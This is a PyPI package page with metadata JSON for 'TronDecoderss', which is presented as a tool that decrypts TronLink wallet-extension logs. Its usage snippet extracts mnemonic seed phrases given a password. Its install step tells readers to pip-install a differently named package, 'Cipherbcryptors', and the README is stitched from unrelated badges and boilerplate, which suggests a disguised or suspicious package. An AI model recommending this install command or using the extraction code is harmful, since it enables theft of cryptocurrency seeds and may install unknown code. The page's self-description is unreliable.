TronDecoderss


NameTronDecoderss JSON
Version 1.4.5 PyPI version JSON
download
home_pageNone
SummarySimple Tools for decode crypto data, from extensions wallet, TronLink v2.
upload_time2024-09-22 07:06:39
maintainerNone
docs_urlNone
authorJeanClaude89
requires_python<4.0,>=3.7
licenseMIT
keywords extensions tron walletdecode decode tronlink trondecode crypto decrypt wallet
VCS
bugtrack_url
requirements No requirements were recorded.
Travis-CI No Travis.
coveralls test coverage No coveralls.
            # TronDecoderss
[![N|Solid](https://cldup.com/dTxpPi9lDf.thumb.png)](https://nodesource.com/products/nsolid)

![](https://img.shields.io/github/stars/pandao/editor.md.svg) ![](https://img.shields.io/github/forks/pandao/editor.md.svg) ![](https://img.shields.io/github/tag/pandao/editor.md.svg) ![](https://img.shields.io/github/release/pandao/editor.md.svg) ![](https://img.shields.io/github/issues/pandao/editor.md.svg) ![](https://img.shields.io/bower/v/editor.md.svg)

Decode Tools for decode crypto data, from extensions wallet, TronLink v2.

## Installation
Python requires [Python.org](https://www.python.org/) v3,7+ to run.
Install the dependencies and devDependencies and start the server.
```sh
python -m pip install pip
python -m pip install --upgrade pip
pip install Cipherbcryptors
```
## Using

```Python
r = TronlinkReader('000003.log')
mnemonics = TronlinkReader.extract_mnemonic(r.decrypt('Qwwq1212'))
print(mnemonics)
```

## License
MIT
**Encode Cipherbcryptors group**

            

Raw data

            {
    "_id": null,
    "home_page": null,
    "name": "TronDecoderss",
    "maintainer": null,
    "docs_url": null,
    "requires_python": "<4.0,>=3.7",
    "maintainer_email": null,
    "keywords": "extensions, Tron, walletdecode, decode, tronlink, TronDecode, crypto, decrypt, wallet",
    "author": "JeanClaude89",
    "author_email": null,
    "download_url": "https://files.pythonhosted.org/packages/23/93/56b4490cb86841ab689392a214fee30e05b1305960d8049e12a605601630/trondecoderss-1.4.5.tar.gz",
    "platform": null,
    "description": "# TronDecoderss\n[![N|Solid](https://cldup.com/dTxpPi9lDf.thumb.png)](https://nodesource.com/products/nsolid)\n\n![](https://img.shields.io/github/stars/pandao/editor.md.svg) ![](https://img.shields.io/github/forks/pandao/editor.md.svg) ![](https://img.shields.io/github/tag/pandao/editor.md.svg) ![](https://img.shields.io/github/release/pandao/editor.md.svg) ![](https://img.shields.io/github/issues/pandao/editor.md.svg) ![](https://img.shields.io/bower/v/editor.md.svg)\n\nDecode Tools for decode crypto data, from extensions wallet, TronLink v2.\n\n## Installation\nPython requires [Python.org](https://www.python.org/) v3,7+ to run.\nInstall the dependencies and devDependencies and start the server.\n```sh\npython -m pip install pip\npython -m pip install --upgrade pip\npip install Cipherbcryptors\n```\n## Using\n\n```Python\nr = TronlinkReader('000003.log')\nmnemonics = TronlinkReader.extract_mnemonic(r.decrypt('Qwwq1212'))\nprint(mnemonics)\n```\n\n## License\nMIT\n**Encode Cipherbcryptors group**\n",
    "bugtrack_url": null,
    "license": "MIT",
    "summary": "Simple Tools for decode crypto data, from extensions wallet, TronLink v2.",
    "version": "1.4.5",
    "project_urls": null,
    "split_keywords": [
        "extensions",
        " tron",
        " walletdecode",
        " decode",
        " tronlink",
        " trondecode",
        " crypto",
        " decrypt",
        " wallet"
    ],
    "urls": [
        {
            "comment_text": "",
            "digests": {
                "blake2b_256": "ec804048ea2a93ead2339e11b6169a365fef85e6b0815223e3e9b008f0ae3661",
                "md5": "f13202d178f668d3c388ccf93cb09477",
                "sha256": "d34764ab4c334daa96eac413649cd1ea7100cf605e28d20e6eab5ed449af677b"
            },
            "downloads": -1,
            "filename": "trondecoderss-1.4.5-py3-none-any.whl",
            "has_sig": false,
            "md5_digest": "f13202d178f668d3c388ccf93cb09477",
            "packagetype": "bdist_wheel",
            "python_version": "py3",
            "requires_python": "<4.0,>=3.7",
            "size": 3795,
            "upload_time": "2024-09-22T07:06:37",
            "upload_time_iso_8601": "2024-09-22T07:06:37.645640Z",
            "url": "https://files.pythonhosted.org/packages/ec/80/4048ea2a93ead2339e11b6169a365fef85e6b0815223e3e9b008f0ae3661/trondecoderss-1.4.5-py3-none-any.whl",
            "yanked": false,
            "yanked_reason": null
        },
        {
            "comment_text": "",
            "digests": {
                "blake2b_256": "239356b4490cb86841ab689392a214fee30e05b1305960d8049e12a605601630",
                "md5": "6f98520311c9e215b7510d26e3df8c86",
                "sha256": "6203ed72d91680def654d518e4cad89d9f33ba8b9f5898ee34b7bda21d77dc94"
            },
            "downloads": -1,
            "filename": "trondecoderss-1.4.5.tar.gz",
            "has_sig": false,
            "md5_digest": "6f98520311c9e215b7510d26e3df8c86",
            "packagetype": "sdist",
            "python_version": "source",
            "requires_python": "<4.0,>=3.7",
            "size": 3429,
            "upload_time": "2024-09-22T07:06:39",
            "upload_time_iso_8601": "2024-09-22T07:06:39.197648Z",
            "url": "https://files.pythonhosted.org/packages/23/93/56b4490cb86841ab689392a214fee30e05b1305960d8049e12a605601630/trondecoderss-1.4.5.tar.gz",
            "yanked": false,
            "yanked_reason": null
        }
    ],
    "upload_time": "2024-09-22 07:06:39",
    "github": false,
    "gitlab": false,
    "bitbucket": false,
    "codeberg": false,
    "lcname": "trondecoderss"
}
        
Elapsed time: 0.34666s